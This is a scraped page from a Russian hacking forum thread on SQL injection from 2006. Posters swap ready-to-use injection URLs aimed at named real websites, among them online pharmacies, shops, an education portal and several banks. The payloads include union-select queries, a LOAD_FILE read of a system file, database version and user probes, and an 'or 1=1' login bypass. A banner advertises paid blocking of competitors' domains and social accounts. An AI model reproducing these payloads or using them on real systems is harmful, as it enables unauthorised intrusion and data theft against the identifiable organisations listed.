Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 11 из 1242

Опции темы

Поиск в этой теме

Опции просмотра

#101

31.10.2006, 12:52

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Нам cfm не преграда

canpharm.com

Цитата:

https://www.canpharm.com/index.cfm/fuseaction/cart.add?cart_productsize_fk=1+or+1=(SELECT+TOP+10 +TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+T ABLE_NAME+NOT+IN+(Provincestate))--

#102

31.10.2006, 12:57

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Zloy.org
http://zloy.org/news_n93'4.html
Уже месяц не могу закрыть...

#103

31.10.2006, 13:00

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

BlueShop.ru

Цитата:

http://blueshop.ru/details.php?product_id=-796+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0/*

forum.vbios.com

Цитата:

http://forum.vbios.com/addons/kit/serverinfo.php?id=-1%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0/*

#104

31.10.2006, 13:01

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

И моя Гордость

Цитата:

http://www.secureusmeds.com/prices~category~0+union+select+convert(%22null%22% 20using%20utf8),LOAD_FILE('C:/boot.ini')+from+users.asp

#105

31.10.2006, 13:26

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Инет Магаз

Цитата:

http://apeks-msk.ru/category.php?id=-1+union+select+1,user(),3,4,5,6,7,8/*

Еще

Цитата:

http://antinomical.com/article/index.php?id_page=1+union+select+1,char(72,97,99,1 07,101,100,32,98,121,32,91,32,99,97,115,104,32,93) ,3,4,5,6,7/*

Последний раз редактировалось [ cash ]; 31.10.2006 в 13:30..

#106

31.10.2006, 15:06

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Цитата:

Сообщение от corsp_puttrider

http://abris.info/price/mark1.asp?id=-1

http://abris.info/price/mark1.asp?id=1 or 1=@@version--
http://abris.info/price/mark1.asp?id=1 or 1=(select db_name())--

табличка login там

#107

31.10.2006, 15:08

_-[A.M.D]HiM@S-_

Green member

Регистрация: 28.12.2005

Сообщений: 376

Провел на форуме:
5559831

Репутация: 1833

Цитата:

Сообщение от [ cash ]

forum.vbios.com

ты уже 3 раз постиш это.

23.10.2006, 01:48

Цитата:

Сообщение от _-[A.M.D]HiM@S-_

PHP код:


		
			
http://forum.vbios.com/addons/kit/serverinfo.php?id=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1320/*

Последний раз редактировалось _-[A.M.D]HiM@S-_; 31.10.2006 в 15:19..

#108

31.10.2006, 15:39

~~gemaglabin~~

Banned

Регистрация: 01.08.2006

Сообщений: 725

Провел на форуме:
7681825

Репутация: 4451

_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7' - далее жмем на любой форум и видим

Цитата:

query failed: insert into nuke_referer values (NULL, '_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7''):You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7'')' at

_http://www.srochno.mk.ru/article.asp?id=8324'

Пройдемся по банкам %)

_http://www.rs.ru/ru/index.php?id70=320'

_http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178'

_http://www.trust.ru/common/promo_redirect.php?cid='13&lid=1&v=0&ul=L3J1L2luZG l2aWR1YWwvc2F2aW5ncy8=

_http://www.nbt.tj/?c=44&id=4'4&a=263'

_http://www.russlavbank.com/content.phtml?prcenter.newsdetail.276'

_http://www.sdm-bank.ru/news/20044'

_http://www.mtbank.ru/index.php?action='

_http://www.roscredit.ru/main/newsroom/news/38'

_http://www.forexpf.ru/forum/ - уязвим ( 2.1.6 rst exploit )

_http://www.paritate.ru/othernews/610301600'

#109

01.11.2006, 04:36

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Ребят а есть ли смысл выкладывать тут иньекции без перебора полей... я есть ли выложить около тысячи.

Подставляя одинарную кавычку далеко не уйдешь имхо.

#110

01.11.2006, 13:32

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

shop.liprom.ru
apace+win+mssql

жесть...

http://shop.liprom.ru/index.php
post
login ' or 1=1--
pass ' or 1=1--

далле
http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=@@version--

http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=(select+system_user)--

http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=(select%20db_name())--

Далее

http://shop.liprom.ru/test/
post
login ' or 1=1--
pass ' or 1=1--

Ну и инклуд думаю все заметят...

Страница 11 из 1242

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход